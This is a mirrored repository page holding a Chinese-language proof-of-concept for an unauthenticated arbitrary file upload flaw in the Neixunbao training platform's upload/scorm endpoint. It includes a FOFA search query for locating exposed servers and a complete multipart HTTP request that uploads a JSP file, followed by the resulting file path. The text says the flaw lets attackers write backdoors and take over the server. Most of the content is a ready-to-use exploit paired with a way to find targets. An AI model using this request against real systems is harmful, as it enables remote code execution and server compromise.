admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/内训宝科技/内训宝scorm存在任意文件上传漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

1.3 KiB
Raw Blame History

内训宝scorm存在任意文件上传漏洞

北京内训宝科技有限公司是一家国内知名的在线教育基础服务提供商专注于在线教育基础服务并开发符合互联网发展潮流的在线教育产品。内寻宝为北京内训宝科技有限公司专门用于培训行业所开发的一款基于java的服务平台。

内训宝企业培训平台 upload/scorm 接口存在文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

fofa

body="static/nxb/css"

poc

POST /upload/scorm HTTP/1.1
Host: 
Referer:
Content-Type: multipart/form-data; boundary=----w80tipyzy4xm9y5cb2zk

------w80tipyzy4xm9y5cb2zk
Content-Disposition: form-data; name="fileupload"; filename="test.jsp"
Content-Type: application/octet-stream

<%out.print(111 * 111);%>
------w80tipyzy4xm9y5cb2zk--


/upload/imgdefault/common/20241231/1735632951571259198.jsp